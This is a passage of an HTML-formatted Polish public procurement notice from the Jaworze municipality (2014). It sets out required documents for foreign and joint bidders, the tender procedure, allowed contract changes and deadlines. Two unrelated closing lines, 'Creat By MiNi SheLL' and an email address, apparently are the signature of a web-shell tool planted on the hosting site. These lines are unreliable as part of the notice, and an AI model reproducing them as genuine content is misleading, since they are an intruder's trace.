6.4.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 6.2.2. - 6.2.4. oraz w 6.2.6. SIWZ  składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
6.4.1.	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
6.4.2.	nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
6.4.3.	nie orzeczono wobec niego zakazu ubiegania się o zamówienia - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
5.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 6.2.5. i 6.2.7. SIWZ  składa zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust.1 pkt 4-8  i 10-11 uPzp, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.
6.	Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 6.4. i 6.5., zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Przepis pkt. 6.4. i 6.5. stosuje się odpowiednio.
7.	Jeżeli, w przypadku Wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, 
o których mowa w art. 24 ust. 1 pkt 5-8 i 10-11 uPzp, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania, dotyczące niekaralności tych osób w zakresie określonym w art. 24ust. 1 pkt 5-8 i 10-11 uPzp, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu z tym, że w przypadku gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób lub przed notariuszem.
8.	Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę 
z zastrzeżeniem, że oświadczenie o spełnianiu warunków udziału w postępowaniu oraz zobowiązanie innego podmiotu należy złożyć w formie oryginału.
9.	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kserokopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
10.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia publicznego (np. w formie konsorcjum, spółki cywilnej lub innego porozumienia regulującego ich współpracę w celu uzyskania zamówienia) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego.  Do wykonawców o których mowa w art. 23 ust.1 uPzp stosuje się art. 141 uPzp. Przed podpisaniem umowy zamawiający będzie żądał od wykonawców ubiegających się wspólnie, umowy regulującej współpracę tych podmiotów.
11.	W wypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia (np. w formie konsorcjum, spółki cywilnej lub innego porozumienia regulującego ich współpracę w celu uzyskania zamówienia) dokumenty, o których mowa w pkt 6.2.1.- pkt 6.2.7 SIWZ  winny zostać przedłożone odrębnie w odniesieniu do każdego z wykonawców. Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną 
w art. 366 Kodeksu cywilnego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art.144 uPzp Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na odstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jedne 
z okoliczności wymienionych poniżej:
1.	Zmiana podwykonawcy lub dalszego podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy.
2.	Rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy - na wniosek Wykonawcy w postaci pisemnej zgody Zamawiającego;
3.	Zmiana osoby / osób wskazanych w umowie jako nadzorujących roboty - na wniosek Zamawiającego.
4.	Zmian w zakresie zasad rozliczeń i warunków płatności związanych z zawarciem umowy 
o podwykonawstwo lub dalsze  podwykonawstwo. 
5.	Zmiany terminu wykonania umowy o czas opóźnienia jeżeli takie opóźnienie wystąpi lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
-zawieszenia robót przez Zamawiającego,
-szczególnie niesprzyjających warunków atmosferycznych, 
-zmian w dokumentacji dokonanych na wniosek Zamawiającego,
-opóźnienia przekazania terenu realizacji robót,
-	zmiany terminu dokonania odbioru robót przewidzianych w umowie,
-	siły wyższej, 
Zmiany sposobu realizacji przedmiotu zamówienia w postaci:
1.	konieczności realizacji zamówienia przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w specyfikacjach, w przypadku gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem zamówienia,
2.	konieczności zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych ze względu na zmiany obowiązującego prawa,
Zmiany wysokości wynagrodzenia - na wskutek rezygnacji z wykonania części robót lub obniżenia wynagrodzenia z powodu zastosowanych rozwiązań zamiennych wraz z określeniem maksymalnej wielkości tych robót 
i określeniem kwoty należnej za tą część w granicach udokumentowanego interesu Zamawiającego - na wniosek Inspektora Nadzoru Inwestorskiego w postaci pisemnej akceptacji Wykonawcy i Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jaworze.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jaworze
43-384 Jaworze, ul. Zdrojowa 82, pokój nr 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2014 godzina 10:00, miejsce: Urząd Gminy Jaworze
43-384 Jaworze, ul. Zdrojowa 82, pokój nr 001.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Operacja współfinansowana przez Unię Europejską ze środków finansowych Europejskiego Funduszu Rybackiego zapewniającą inwestycje w zrównoważone rybołówstwo.


Zamawiający przewiduje  w okresie 3 lat od udzielenia niniejszego zamówienia podstawowego udzielenie  
Wykonawcy zamówień uzupełniających, polegających na dostawie gablot wystawowych, plansz informacyjnych, plansz tekstowych.
Zamówienia uzupełniające będą stanowiły nie więcej niż 50% wartości zamówienia podstawowego.
Zamawiający udzieli zamówień uzupełniających po zapewnieniu odpowiednich środków finansowych na ich 
 realizację..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com